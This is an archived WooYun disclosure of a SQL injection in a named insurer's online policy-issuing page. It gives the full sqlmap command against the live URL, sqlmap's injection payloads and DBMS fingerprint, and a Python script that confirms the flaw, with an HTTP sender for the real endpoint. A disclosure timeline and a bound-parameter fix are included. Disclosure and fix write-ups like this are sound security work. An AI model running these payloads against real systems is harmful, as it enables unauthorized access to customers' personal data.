WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2015-06-14: Details sent to the vendor, awaiting vendor handling
2015-06-19: Vendor confirmed; details disclosed to the vendor only
2015-06-29: Details disclosed to core white hats and relevant domain experts
2015-07-09: Details disclosed to ordinary white hats
2015-07-19: Details disclosed to intern white hats
2015-08-03: Details disclosed to the public
SQL injection
Huaxia Life aviation accident insurance policy-issuing system: http://gdxt.hxlife.com/ui
When the policy-issuing system is opened it loads the file http://gdxt.hxlife.com/ui/common/cvar/CExec.jsp, whose content is roughly the following:
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=GBK"></head>
<form name='fm' action='CExec.jsp' method='POST'>
  <input type='hidden' name='txtVarData' value=''>
  <input type='hidden' name='txtCodeName' value=''>
  <input type='hidden' name='txtOther'>
  <input type='hidden' name='txtFrameName'>
  <input type='hidden' name='txtSQL'>
  <input type='hidden' name='startIndex'>
  <input type='hidden' name='txtQueryResult'>
  <input type='hidden' name='mOperate'>
  <input type='hidden' name='txtCodeCondition'>
  <input type='hidden' name='txtConditionField'>
  <input type='hidden' name='txtShowWidth'>
</form>
<SCRIPT language="JavaScript1.2">
window.status="finished";
try{ top.achieveEX = true; // used to signal that page initialisation has finished
}catch(ex){}
</SCRIPT>
</html>
Every field is a hidden POST parameter, so the request can be rebuilt locally (filler value 328044 in every field) and handed to sqlmap, testing the txtCodeCondition parameter:
python SQLMap/SQLMap.py -u "http://gdxt.hxlife.com/ui/common/cvar/CExec.jsp" --data "txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=328044&txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044" -p txtCodeCondition --risk 3 --level 3 --current-db
Parameter: txtCodeCondition (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
    Payload: txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=-5592' OR (2725=2725)-- &txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=328044' UNION ALL SELECT CHR(113)||CHR(120)||CHR(107)||CHR(113)||CHR(113)||CHR(103)||CHR(85)||CHR(111)||CHR(85)||CHR(114)||CHR(111)||CHR(121)||CHR(84)||CHR(118)||CHR(118)||CHR(113)||CHR(98)||CHR(118)||CHR(113)||CHR(113),NULL,NULL,NULL,NULL FROM DUAL-- &txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query - comment)
    Payload: txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=328044' AND 3821=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--&txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044
---
[22:31:25] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
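The boolean-based blind finding above can be confirmed by hand without sqlmap: send the same POST body three times (filler value, tautology, contradiction) and check that only the tautology changes the response. The script below is an added example, not code from the original report or from the Huaxia Life system. The server side it tests against is a hypothetical reconstruction of a string-concatenated lookup, run on SQLite so the check works offline; the real back end is Oracle, and the `http_sender` transport is included only to show how the same check would be pointed at CExec.jsp.

```python
"""Hand-check of a boolean-based blind injection in a POST parameter.

Added example. The eleven form fields and the filler value 328044 come from
the report; the server-side SQL in `vulnerable_sender` is a hypothetical
reconstruction (SQLite, not Oracle) so the check can run offline.
"""
import sqlite3
import urllib.parse
import urllib.request

# The hidden fields of CExec.jsp, in the order the report sent them.
FORM_FIELDS = ("txtVarData", "txtOther", "txtFrameName", "txtSQL", "startIndex",
               "txtQueryResult", "mOperate", "txtCodeCondition",
               "txtConditionField", "txtShowWidth", "txtCodeName")
FILLER = "328044"

# Same shape as sqlmap's payload: a tautology and a contradiction, both
# closing the quoted literal and commenting out the rest of the clause.
TRUE_PAYLOAD = FILLER + "' OR (2725=2725)-- "
FALSE_PAYLOAD = FILLER + "' OR (2725=2726)-- "


def build_body(code_condition):
    """POST body with every field set to FILLER except txtCodeCondition."""
    fields = {name: FILLER for name in FORM_FIELDS}
    fields["txtCodeCondition"] = code_condition
    return urllib.parse.urlencode(fields)


def confirm_boolean_blind(send):
    """send(body) -> response text.

    Returns True when the tautology changes the response while the
    contradiction leaves it identical to the baseline, i.e. the value is
    evaluated inside a WHERE/HAVING clause rather than treated as data.
    """
    baseline = send(build_body(FILLER))
    true_resp = send(build_body(TRUE_PAYLOAD))
    false_resp = send(build_body(FALSE_PAYLOAD))
    return true_resp != baseline and false_resp == baseline


def http_sender(url):
    """Real transport (assumed, not exercised offline): POST the body to url."""
    def send(body):
        req = urllib.request.Request(
            url, data=body.encode("ascii"),
            headers={"Content-Type": "application/x-www-form-urlencoded"})
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.read().decode("gbk", "replace")  # page charset is GBK
    return send


# --- offline stand-in for the back end, with constructed sample rows ---
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE codes (code_condition TEXT, name TEXT)")
    conn.executemany("INSERT INTO codes VALUES (?, ?)",
                     [("A01", "aviation accident"), ("A02", "travel")])
    return conn


def vulnerable_sender(conn):
    """Hypothetical vulnerable handler: txtCodeCondition is concatenated into SQL."""
    def send(body):
        cond = urllib.parse.parse_qs(body)["txtCodeCondition"][0]
        sql = "SELECT name FROM codes WHERE code_condition = '%s'" % cond
        return repr(conn.execute(sql).fetchall())
    return send


def hardened_sender(conn):
    """Same lookup with a bound parameter: the payload is only a literal value."""
    def send(body):
        cond = urllib.parse.parse_qs(body)["txtCodeCondition"][0]
        rows = conn.execute(
            "SELECT name FROM codes WHERE code_condition = ?", (cond,)).fetchall()
        return repr(rows)
    return send


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler injectable:", confirm_boolean_blind(vulnerable_sender(db)))
    print("hardened handler injectable:  ", confirm_boolean_blind(hardened_sender(db)))
```

Against the concatenating handler the tautology returns every row and the contradiction returns none, so the check reports an injection; with the bound parameter all three requests return the same empty result. The UNION and time-based payloads sqlmap listed are Oracle-specific (`FROM DUAL`, `CHR()||...`, the `ALL_USERS` cross-join heavy query), which is how it fingerprinted the DBMS.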
The system holds a large volume of data.
Fix suggestion: filter the input; the robust fix is to pass txtCodeCondition as a bound query parameter instead of building the SQL string from it.
Severity: Medium
Vulnerability rank: 10
Confirmed: 2015-06-19 12:12
CNVD confirmed and reproduced the described issue; it has been passed to CNCERT for notification, which will coordinate handling with the unit administering the site.
None yet.